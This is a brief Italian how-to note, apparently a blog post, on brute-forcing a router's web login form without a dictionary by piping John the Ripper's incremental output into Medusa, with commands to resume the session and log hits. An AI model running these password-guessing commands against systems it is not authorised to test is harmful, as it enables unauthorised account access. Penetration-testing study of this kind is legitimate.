Brute force senza dizionario con John the Ripper e Medusa

Veloce segnalazione per non dimenticarmi un metodo per effettuare un attacco brute force senza utilizzare un dizionario servendosi di John the Ripper e Medusa. Nell’esempio che segue il brute force è lanciato contro l’indirizzo 192.168.1.1, provando come username “admin” contro un form web (opzione di Medusa -M web-from):

#john --incremental=all --session=RouterBrute --stdout | xargs -L 1 medusa -h 192.168.1.1 -u admin -M web-form -p

nel caso si doveste interrompere e successivamente riprendere il brute force questo è il comando:

#john --restore=RouterBrute | xargs -L 1 medusa -h 192.168.1.1 -u admin -M web-form -p

Con i comandi dati in precedenza non si avrà un alert che interrompa il brute force e ci dica se la password è stata individuata per questo si può effettuare un pipe dell’output in un file e successivamente lanciare grep per cercare la stringa “FOUND” per individuare la password del nostro “bersaglio”

#john --restore=RouterBrute | xargs -L 1 medusa -h 192.168.1.1 -u admin -M web-form -p >> check.txt

Fonte: Brute force without a dictionary using john